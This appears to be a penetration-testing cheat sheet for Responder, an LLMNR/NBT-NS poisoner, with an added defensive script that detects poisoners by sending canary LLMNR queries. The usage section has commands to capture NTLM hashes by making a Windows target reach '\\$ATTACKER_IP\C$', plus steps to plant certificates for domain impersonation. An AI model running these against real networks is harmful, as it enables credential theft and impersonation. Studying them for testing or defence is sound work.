Responder

Responder is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
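Because a poisoner of this kind answers LLMNR queries for names that do not exist, a defender can detect one by asking for a random name and seeing who replies. The script below is an added example, not part of the original page or of Responder; the `wks-` canary prefix and the function names are assumptions.

```python
import secrets
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 IPv4 multicast group / UDP port


def build_query(name, txid):
    """Build an LLMNR A-record query for a single-label name (DNS wire format)."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)  # id, flags, 1 question
    label = name.encode("ascii")
    return header + bytes([len(label)]) + label + b"\x00" + struct.pack(">HH", 1, 1)


def answers_canary(packet, name, txid):
    """True if packet is a response (QR=1) carrying an answer for our canary name."""
    if len(packet) < 13:
        return False
    rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", packet[:12])
    if rid != txid or not flags & 0x8000 or qd != 1 or an == 0:
        return False
    n = packet[12]  # length of the first label in the echoed question
    return packet[13:13 + n].lower() == name.lower().encode("ascii")


def probe(timeout=2.0):
    """Query a random canary name; return it and the IPs that answered (expect none)."""
    name = "wks-" + secrets.token_hex(4)  # hypothetical prefix; must not be a real host
    txid = secrets.randbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)  # stay on-link
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = set()
    try:
        while True:  # LLMNR responses arrive unicast on the sending socket
            data, (ip, _) = sock.recvfrom(1024)
            if answers_canary(data, name, txid):
                hits.add(ip)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, sorted(hits)


if __name__ == "__main__":
    canary, hits = probe()
    print(f"canary {canary}: " + (f"answered by {hits}, possible poisoner" if hits else "no answer"))
```

Run it periodically from a host on each monitored segment; any address that answers a random canary warrants investigation. The probe leaves on the default interface, so multi-homed hosts need a route or bind for the segment being checked.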

Usage

Grab NTLM Token

  • Set up Responder
responder -I tun0 -wrvd
  • Open a shell on the Windows target and request a share from the attacker's SMB server, i.e. Responder
dir \\$ATTACKER_IP\C$

Impersonate Domain -- Change Responder's certificates

  • After using nsupdate to add the attacker as a subdomain, do the following tasks:
  • Add a certificate and its private key to
/usr/share/responder/certs
  • Edit Responder.conf
[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
  • Start Responder
responder -I <interface>